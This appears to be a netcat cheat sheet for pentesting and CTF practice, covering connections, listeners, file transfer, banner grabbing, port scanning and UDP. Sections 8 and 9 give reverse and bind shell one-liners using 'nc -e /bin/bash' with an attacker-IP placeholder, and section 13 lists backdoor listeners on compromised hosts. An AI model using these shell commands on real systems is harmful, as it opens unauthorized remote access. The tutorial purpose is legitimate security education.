1. INTRODUCTION
Netcat (nc) is a versatile networking tool used for reading/writing data over TCP or UDP.
It can function as:
bash
Client
bash
Server
bash
File transfer utility
bash
Banner grabber
bash
Reverse/bind shell handler
bash
Port scanner
Often called the “Swiss Army Knife” of networking.
2. BASIC CONNECTION
Connect to a TCP port:
bash
nc <IP> <PORT>
Example:
bash
nc 192.168.1.10 80
Use this to manually interact with services (HTTP, SMTP, FTP, custom servers).
3. LISTENING MODE (SERVER)
Start a TCP listener:
bash
nc -l -p <PORT>
Example:
bash
nc -l -p 4444
Used for:
bash
Wait for reverse shells
bash
Receive file transfers
bash
Chat sessions
4. SEND & RECEIVE FILES
Send a file:
bash
nc <IP> <PORT> < file.txt
Receive a file:
bash
nc -l -p <PORT> > received.txt
Example:
Sender:
bash
nc 10.10.10.5 9001 < secret.zip
Receiver:
bash
nc -l -p 9001 > secret.zip
5. CHAT SESSION (PEER-TO-PEER)
Machine A:
bash
nc -l -p 5000
Machine B:
bash
nc <IP_OF_A> 5000
Useful for:
bash
Quick communication
bash
Testing network connections
6. BANNER GRABBING
Read service banner:
bash
nc <HOST> <PORT>
Example:
bash
nc example.com 25
Useful for identifying:
bash
SMTP/FTP versions
bash
Web server banners
bash
Custom protocols (CTFs!)
7. PORT SCANNING
Simple port scan:
bash
nc -zv <IP> <PORT-RANGE>
Example:
bash
nc -zv 192.168.1.10 1-1000
Flags:
bash
-z : scan mode
bash
-v : verbose output
8. REVERSE SHELL
Victim → Attacker (Victim initiates connection)
Victim:
bash
nc <ATTACKER_IP> <PORT> -e /bin/bash
Attacker:
bash
nc -l -p <PORT>
Example:
Victim:
bash
nc 10.10.10.5 4444 -e /bin/bash
Attacker:
bash
nc -l -p 4444
9. BIND SHELL
Victim listens, attacker connects.
Victim:
bash
nc -l -p 4444 -e /bin/bash
Attacker:
bash
nc <VICTIM_IP> 4444
10. UDP MODE
Send UDP packet:
bash
nc -u <IP> <PORT>
Listen on UDP:
bash
nc -u -l -p <PORT>
Example:
bash
nc -u 192.168.1.10 53
Useful for testing:
bash
DNS
bash
VoIP services
bash
Custom UDP protocols
11. SENDING RAW / HEX DATA
Send raw bytes:
bash
echo -n -e "\x41\x42\x43" | nc <IP> <PORT>
Useful for:
bash
Fuzzing
bash
Protocol testing
bash
Exploit development
12. TIMEOUTS
Set timeout for connections:
bash
nc -w <SECONDS> <IP> <PORT>
Example:
bash
nc -w 3 10.10.10.5 80
13. REAL PENTEST & CTF USE CASES
bash
Banner grabbing for version enumeration
bash
Receiving reverse shells from exploited servers
bash
Transferring privesc scripts (linpeas/winpeas)
bash
Testing firewall rules (TCP/UDP)
bash
Backdoor listeners on compromised hosts
bash
Quick chat channels for team coordination
bash
Scanning ports in restricted environments
← Back to tutorial